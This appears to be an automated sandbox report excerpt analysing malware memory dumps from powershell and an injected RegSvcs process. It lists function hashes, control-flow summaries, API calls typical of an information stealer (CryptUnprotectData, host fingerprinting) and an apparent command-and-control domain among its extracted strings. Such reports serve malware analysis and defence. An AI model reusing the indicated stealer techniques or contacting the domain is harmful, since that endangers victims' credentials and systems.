                                                                            • Opcode Fuzzy Hash: 518b59ef5ce4bb795ebda41ff225531e08c198866228df31cfa6cf50de7dd2bc
                                                                            • Instruction Fuzzy Hash: 17F02413F8E99E8FFBA8A26C24456FA6BC5DF56520B4881BAE44EC3283DC059C0943C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fb7f17d16d5aa26b771d40af4e8b64242fc99389fe0a8970e8d4880ef75eb94
                                                                            • Instruction ID: 83dd7105f33f1c4ad8f131c99dd1eff23da2fe9126aa8d49db3c9a7513b24a38
                                                                            • Opcode Fuzzy Hash: 4fb7f17d16d5aa26b771d40af4e8b64242fc99389fe0a8970e8d4880ef75eb94
                                                                            • Instruction Fuzzy Hash: C6F0C23180D6CE8FEB659F64C8552E93FA0FF52300F0445BAE48C83492CA7A9558C781
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9646f8152efc61e5660b4ea87d28859819651d1727e0361159ebcfd2172e6c87
                                                                            • Instruction ID: 2cb20124c1eb8bc5f6db0891fe8817ff6396b2adec8351dba2d4f3ec84903021
                                                                            • Opcode Fuzzy Hash: 9646f8152efc61e5660b4ea87d28859819651d1727e0361159ebcfd2172e6c87
                                                                            • Instruction Fuzzy Hash: 63F0677081424DCFEB44EF2894095EA37A0FF49308F50456AF81D82240CB34E654CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 238bb28938677b0ebbae26e197daa61e26c96432a0505dc7e3244e8a3b493a52
                                                                            • Instruction ID: 696fc56aac091907f4f6c193ee891425e52115e18d5b1c7dde16dc4cbf12287a
                                                                            • Opcode Fuzzy Hash: 238bb28938677b0ebbae26e197daa61e26c96432a0505dc7e3244e8a3b493a52
                                                                            • Instruction Fuzzy Hash: 9FF01775D0420BCFDB00DFA8C4855BEB7B0AB05314F108925C129E7250DB38EA508F84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07ed015e6494394615ab09e0ab4d0026b084b62ac782e46b95bb78be9cfd3682
                                                                            • Instruction ID: 089e09253febd0c3c2703ba151328449fcb96de2afa272ccdf248df7540313c3
                                                                            • Opcode Fuzzy Hash: 07ed015e6494394615ab09e0ab4d0026b084b62ac782e46b95bb78be9cfd3682
                                                                            • Instruction Fuzzy Hash: 55F01C30D0950D8FE798DB38C8547ECB6B0AF15340F0080FA904DE61A1DE342AC58F05

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11adf2dc3a0806ebc0bf174e244545f7af7874155b8a512b232d9fd3c32cb735
                                                                            • Instruction ID: f52795e443151bcb82f7d9e5ed6e3bc7d92449b23592bfcdedbd67169de6c425
                                                                            • Opcode Fuzzy Hash: 11adf2dc3a0806ebc0bf174e244545f7af7874155b8a512b232d9fd3c32cb735
                                                                            • Instruction Fuzzy Hash: 3002C297A0E7D29FF313476C58B91E53F60EFA3629B0940F7C1D88A093E918594E83E5

                                                                            Execution Graph

                                                                            Execution Coverage:5.9%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:37.3%
                                                                            Total number of Nodes:295
                                                                            Total number of Limit Nodes:27
                                                                            [Execution graph (Joe Sandbox IDA Plugin): rendered node/edge list omitted; nodes are function addresses in the RegSvcs and powershell dumps with their resolved API calls (RtlAllocateHeap, RtlFreeHeap, LdrInitializeThunk, RtlExpandEnvironmentStrings, CryptUnprotectData, CoCreateInstance, CoSetProxyBlanket, GetComputerNameExA, GetPhysicallyInstalledSystemMemory, GetVolumeInformationW, GetForegroundWindow, ExitProcess, among others)]

                                                                            Executed Functions

                                                                            Control-flow Graph

                                                                            [Control-flow graph for the function starting at 0043EC10: basic-block and edge list omitted; the APIs reached from this function are listed below]
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(AEA9A8A3,00000000,00000001,49484FBB,00000000), ref: 0043EFA9
                                                                            • SysAllocString.OLEAUT32(9>), ref: 0043F070
                                                                            • CoSetProxyBlanket.COMBASE(0000BE0E,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043F0AE
                                                                            • SysAllocString.OLEAUT32(B2ECBC14), ref: 0043F0EB
                                                                            • SysAllocString.OLEAUT32(ED11F301), ref: 0043F18C
                                                                            • VariantInit.OLEAUT32(?), ref: 0043F1FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                            • String ID: .s7~$0000$05$2s7~$9>$C$\
                                                                            • API String ID: 65563702-157929154
                                                                            • Opcode ID: f679a52da9129afa615ef7267d1bf0b31bc0b1870f37a6ffeadbf1243c1582fe
                                                                            • Instruction ID: 5bd62fa1782f64a5b906d5cad8eaf309934615f36ddd37a47e06fca9717baf20
                                                                            • Opcode Fuzzy Hash: f679a52da9129afa615ef7267d1bf0b31bc0b1870f37a6ffeadbf1243c1582fe
                                                                            • Instruction Fuzzy Hash: 82523375A183419FD714CF28C8817ABBBE1EBD9310F18892EE995C7391D738D806CB96

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            APIs
                                                                              • Part of subcall function 0043A1C0: GetSystemMetrics.USER32 ref: 0043A200
                                                                              • Part of subcall function 0043A1C0: GetSystemMetrics.USER32 ref: 0043A210
                                                                              • Part of subcall function 0043A1C0: DeleteObject.GDI32 ref: 0043A253
                                                                              • Part of subcall function 0043A1C0: SelectObject.GDI32 ref: 0043A2A3
                                                                              • Part of subcall function 0043A1C0: SelectObject.GDI32 ref: 0043A2FA
                                                                              • Part of subcall function 0043A1C0: DeleteObject.GDI32 ref: 0043A328
                                                                            • CoUninitialize.COMBASE ref: 00412777
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                            • String ID: 'bPa$GDVL$H$HLRz$JXLr$MNZb$Y@UT$a|}r$es$toppyneedus.biz$~9o
                                                                            • API String ID: 1556769885-3369938970
                                                                            • Opcode ID: 74399e4d4964ef56206682ed68936d729a64e540827de97b0792b0f078d907e5
                                                                            • Instruction ID: 3f5db8edab9c61520f541d163cbfbf0d3d3ee8140705553f7d56a302672ecd04
                                                                            • Opcode Fuzzy Hash: 74399e4d4964ef56206682ed68936d729a64e540827de97b0792b0f078d907e5
                                                                            • Instruction Fuzzy Hash: 3DA125B450C3D18BD7248F2985A43EBBFE1EF92300F184A6DC4D59B392D7794446CB9A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Object$DeleteMetricsSelectSystem
                                                                            • String ID:
                                                                            • API String ID: 3911056724-3916222277
                                                                            • Opcode ID: 4a9724fb9ddcb8cc8764f3d52301826d8afc170a9f991add1763296750271f49
                                                                            • Instruction ID: d8ef0c89c88b37a59d4e6ea661248bfd4e3723719d43e6beb7202de68050ffce
                                                                            • Opcode Fuzzy Hash: 4a9724fb9ddcb8cc8764f3d52301826d8afc170a9f991add1763296750271f49
                                                                            • Instruction Fuzzy Hash: D68162B05097808FE720DF65D54878BFBF0BB85348F00892EE4999B254D7B95848CF9B

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00433D9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: J$X`_c$skV@$skV@
                                                                            • API String ID: 3960555810-2005354828
                                                                            • Opcode ID: a4b45c8b632581b866df3e25f45b228fa2c145eb8ca146f40679d63fb5943e0a
                                                                            • Instruction ID: e81a7228d023d3b4a69c6ffaa03a894231a2fd9ac06063adaae5aedf1b3b955b
                                                                            • Opcode Fuzzy Hash: a4b45c8b632581b866df3e25f45b228fa2c145eb8ca146f40679d63fb5943e0a
                                                                            • Instruction Fuzzy Hash: 1CA1917160C3828BE729CF39846136BBFE09FA7305F18586EE0D587392D7798905CB56

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 0040BA74
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040BA7E
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040BBC4
                                                                            • GetForegroundWindow.USER32 ref: 0040BBD9
                                                                            • ExitProcess.KERNEL32 ref: 0040BD99
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 4063528623-0
                                                                            • Opcode ID: e0b40994274a72c21af793b1b145087dbff1999c3c617cf599449e7c0adc542b
                                                                            • Instruction ID: c6d0d95a088bac336b3a14bf38012ddc3ad462f7c77cfc1720424f6e08d96a26
                                                                            • Opcode Fuzzy Hash: e0b40994274a72c21af793b1b145087dbff1999c3c617cf599449e7c0adc542b
                                                                            • Instruction Fuzzy Hash: 17813977A487044FC318DF79CC8535ABAD3AFC4310F0A853EA994DB395EA789C098799

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000), ref: 00429F67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: y}$HN$aPz
                                                                            • API String ID: 237503144-931251045
                                                                            • Opcode ID: fedfff6ccaf23c00e99d995cf1c3899f69a2595a8d9b39507aa153b094523d11
                                                                            • Instruction ID: 3d6e7c66f7cc0ffe89aba064b13d3f3f304ca07a6ea66cb67826b42f8b26a17a
                                                                            • Opcode Fuzzy Hash: fedfff6ccaf23c00e99d995cf1c3899f69a2595a8d9b39507aa153b094523d11
                                                                            • Instruction Fuzzy Hash: A4E17CB5E01224CFCB14CF64D8816AABB72FF45314B1A81A9D855AF362E739DC02CF95

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00433D9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: J$X`_c$skV@
                                                                            • API String ID: 3960555810-3359567207
                                                                            • Opcode ID: a0b8be5ced7b63cb53a376060b22c24f7019e0023a268acdea50515a9a4ed71d
                                                                            • Instruction ID: 035e47239e826f27f534e6416137c7c3ebf3fbab117d3c9b8e46e1cdfad2f34f
                                                                            • Opcode Fuzzy Hash: a0b8be5ced7b63cb53a376060b22c24f7019e0023a268acdea50515a9a4ed71d
                                                                            • Instruction Fuzzy Hash: 3091D27160C3828BE729CF39846136BBFE09FAB305F18586EE4C587392D7398905CB56

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %A,C$*qRs$23$2CDE6C0265185D724654FD9A0884370E$yUF@
                                                                            • API String ID: 0-3401900027
                                                                            • Opcode ID: 7bdefcf36309d015c18ce46b43af112fc537c1b5e623236aaa6e7cc0f1a2a40d
                                                                            • Instruction ID: 6042d8d42f8b95c6088e4400987f142d768da2ab63f70eb298ebd0f1098f0102
                                                                            • Opcode Fuzzy Hash: 7bdefcf36309d015c18ce46b43af112fc537c1b5e623236aaa6e7cc0f1a2a40d
                                                                            • Instruction Fuzzy Hash: D7C128B19083508BD714DF74D88166BBBE2EFC2314F144A3DE5E59B391D638C90A8B9A

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: 65W$V_+$V_+$mjkh
                                                                            • API String ID: 2994545307-3447793841
                                                                            • Opcode ID: 8788fcc91d2aabc928657b8f6a254555e90f577f5291a136465f770fae1a41fc
                                                                            • Instruction ID: 215a79a2e85639bcd765fd2aea718205f9cfb5cee2e77218a278173b9c064eb3
                                                                            • Opcode Fuzzy Hash: 8788fcc91d2aabc928657b8f6a254555e90f577f5291a136465f770fae1a41fc
                                                                            • Instruction Fuzzy Hash: 8ED13632B187014BE718CF28D89056BB7E3EFD9310F19C53DE59587296DB78A80A8786

                                                                            Control-flow Graph [rendered graph not reproduced]
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 50$FwPq$Js$'!
                                                                            • API String ID: 0-2761542065
                                                                            • Opcode ID: cecf62e9b4abfb864a88db18d40b6c2797597131c567bbbdd07bc7a848f1ce4f
                                                                            • Instruction ID: 4e6bf2480f77da9bec1d5c114b64c7ab50299f10efae6194e20d1badb95d899f
                                                                            • Opcode Fuzzy Hash: cecf62e9b4abfb864a88db18d40b6c2797597131c567bbbdd07bc7a848f1ce4f
                                                                            • Instruction Fuzzy Hash: 4EB12EB85113408FE318DF66CA89FA93EB5BB10314F1A82E9D5486F236CB708445CF96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: V_+$V_+${rsp
                                                                            • API String ID: 2994545307-2550429205
                                                                            • Opcode ID: 21688b700915ab44ccddca7cdd52f7ef545cca12c5a7280fb822af3c51c1f1c2
                                                                            • Instruction ID: a8d075ee13a02e907279da372650c945f0e7391efac607851ac42c0d504b3f86
                                                                            • Opcode Fuzzy Hash: 21688b700915ab44ccddca7cdd52f7ef545cca12c5a7280fb822af3c51c1f1c2
                                                                            • Instruction Fuzzy Hash: E6C168727083114FD718CF28C89156BB7E2EBC6324F1A863DE8A597395D735DC0A8786
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: OP_@$vUWB
                                                                            • API String ID: 2994545307-361482620
                                                                            • Opcode ID: 8ab973f7c4cceae847145ad844dd442a7f655e249b21c39301527ead578295a5
                                                                            • Instruction ID: 8880bc083489bd42877745cbd987df871580ae8ac31a24fd3c25772d90adc33e
                                                                            • Opcode Fuzzy Hash: 8ab973f7c4cceae847145ad844dd442a7f655e249b21c39301527ead578295a5
                                                                            • Instruction Fuzzy Hash: A8B1A971B083105BD718DE65ACD163FB3D2EBD5314F69853EE9828B3D2E6389806C299
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b666fbb987b62fcf0699fc58f589be2a90b4373d6f22bea5d9fdb2cd99f7f0c9
                                                                            • Instruction ID: 2bb6e82cb67e82422e72d62c4e81f694db083129b0334858f2dfaa7fd2b32362
                                                                            • Opcode Fuzzy Hash: b666fbb987b62fcf0699fc58f589be2a90b4373d6f22bea5d9fdb2cd99f7f0c9
                                                                            • Instruction Fuzzy Hash: 43B118B66083415FC718CF69C4926AFF7D2ABD5304F188A2EE8D987342D738D945CB86
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(00446D6C,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00443ADE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: QPWV
                                                                            • API String ID: 0-1237034553
                                                                            • Opcode ID: a45b21cb5d22bd00ee0d8e213eafbd62e039c6be34689603b219ffec449bb280
                                                                            • Instruction ID: bc9fbc18f579d1fb442f7a1cfedb79b4bbfca8695cb869afd5cf44967252ab31
                                                                            • Opcode Fuzzy Hash: a45b21cb5d22bd00ee0d8e213eafbd62e039c6be34689603b219ffec449bb280
                                                                            • Instruction Fuzzy Hash: CF2106343402006BE7188F289C96BB773A1EB86315F64563DB1A6973E2C6349D5AD748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ejc`
                                                                            • API String ID: 0-1805570023
                                                                            • Opcode ID: a6ff6403b611b4b3eca8ee70a01ab6f142159734446b99def95ba221e831ee42
                                                                            • Instruction ID: c3c3d6c3edbba0c76da3cc982b1f74b3c2a1742a5cab4f06587e54c6178f03e8
                                                                            • Opcode Fuzzy Hash: a6ff6403b611b4b3eca8ee70a01ab6f142159734446b99def95ba221e831ee42
                                                                            • Instruction Fuzzy Hash: 3E1126752083914BC304CFB5A8946AFBBA6EFD2704F14963CE9C167381C6319A078BCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fb0c1e0c8c9a0206f6fb87c980ef27ba1a1daa0ccd8a822f80763afb0d48801
                                                                            • Instruction ID: 87b69505bef963778ae5ab3a8d374906c89afef2df7a5c5756a1b48e747d9d12
                                                                            • Opcode Fuzzy Hash: 2fb0c1e0c8c9a0206f6fb87c980ef27ba1a1daa0ccd8a822f80763afb0d48801
                                                                            • Instruction Fuzzy Hash: DB5125766183118FC7149F24DC5166BB7E1EBC5314F04993DE899EB3A0E738CC058B86

                                                                            Control-flow Graph (rendered graph not reproduced; basic blocks listed from the node data)
                                                                            • Basic blocks: 433209-433215, 433217-43321f, 433220-433229 (self-loop), 43322b-433278 (FreeLibrary, call 4453b0), 433280-4332d4 (self-loop), 4332d6-4332e0, 4332e2-4332e9, 4332f0-4332f9 (self-loop), 4332fb, 4332fd, 433304-43333c (GetComputerNameExA), 43333d (self-loop)
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?), ref: 00433235
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerFreeLibraryName
                                                                            • String ID: GP
                                                                            • API String ID: 2904949787-441890406
                                                                            • Opcode ID: 6563f58ce82020090adf1b72062c6c9ded0c1e7760ea96bc79605ec8a0e8a161
                                                                            • Instruction ID: eddbfa738cb6cfcc30497a27838ad129c4ca1a3f4652ac02fa0e8ba1fa549090
                                                                            • Opcode Fuzzy Hash: 6563f58ce82020090adf1b72062c6c9ded0c1e7760ea96bc79605ec8a0e8a161
                                                                            • Instruction Fuzzy Hash: D831483151C3918BD7298F3D88143ABBBE16B9B305F1486AED4EACB2D1CA3805058743

                                                                            Control-flow Graph (rendered graph not reproduced; basic blocks listed from the node data)
                                                                            • Basic blocks: 433205-433278 (FreeLibrary, call 4453b0), 433280-4332d4 (self-loop), 4332d6-4332e0, 4332e2-4332e9, 4332f0-4332f9 (self-loop), 4332fb, 4332fd, 433304-43333c (GetComputerNameExA), 43333d (self-loop)
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?), ref: 00433235
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerFreeLibraryName
                                                                            • String ID: GP
                                                                            • API String ID: 2904949787-441890406
                                                                            • Opcode ID: 5e3aaa8e12363f3489ef7afd5d3c2543f2de0a94c8b01c3a683ced23e921a2ff
                                                                            • Instruction ID: be0c8a0e1ba4eb4c98f037dce5614ac2d0245b0477652537ed0c6ed9604a5934
                                                                            • Opcode Fuzzy Hash: 5e3aaa8e12363f3489ef7afd5d3c2543f2de0a94c8b01c3a683ced23e921a2ff
                                                                            • Instruction Fuzzy Hash: CC21383251C3918BD728CF3DC9153ABBBE6ABDA305F14867ED4AACB2D1DA3409058743
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00433471
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: {fby
                                                                            • API String ID: 3545744682-2939326382
                                                                            • Opcode ID: dfa66e802a065821fa9aa1e5c3edbdd74e76331a6792d7e278193cc6857eefd8
                                                                            • Instruction ID: cc82bf4fbf4fe6b7fec268d5013ea982f577005c8e03e8b80f453caee362647b
                                                                            • Opcode Fuzzy Hash: dfa66e802a065821fa9aa1e5c3edbdd74e76331a6792d7e278193cc6857eefd8
                                                                            • Instruction Fuzzy Hash: CB31593661C7918BDB398F3888A43EBBBD19BDA315F1D466EC4DE87381CB3848018742
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00433471
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: {fby
                                                                            • API String ID: 3545744682-2939326382
                                                                            • Opcode ID: 7af9c8fd98d14bff63681dd837a83c1179642a7d1f72017eb7558ea3c90a5f9b
                                                                            • Instruction ID: 18ed6c430fb510ef93a7d0f3d5c361979238ae575e65861c39acc9be8d7cf56d
                                                                            • Opcode Fuzzy Hash: 7af9c8fd98d14bff63681dd837a83c1179642a7d1f72017eb7558ea3c90a5f9b
                                                                            • Instruction Fuzzy Hash: CE313977A1C75287DB288F2488553EBB7D29BD9315F2D867ED8DE87381CA3848014742
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: GP
                                                                            • API String ID: 3545744682-441890406
                                                                            • Opcode ID: a4808b73a2fc8d2fb5abad4073aaf5fb6a24ddf11398a80de7234b585a83bbe3
                                                                            • Instruction ID: 2a8d1d81090a14569c5c5b7b0629f3557b313ebb2ade440d1236e0acd55b6529
                                                                            • Opcode Fuzzy Hash: a4808b73a2fc8d2fb5abad4073aaf5fb6a24ddf11398a80de7234b585a83bbe3
                                                                            • Instruction Fuzzy Hash: EF21383251C3518BD728CF3DC9143ABBBE6BBDA304F54866ED4AACB2D5DA7405058743
                                                                            APIs
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126C2
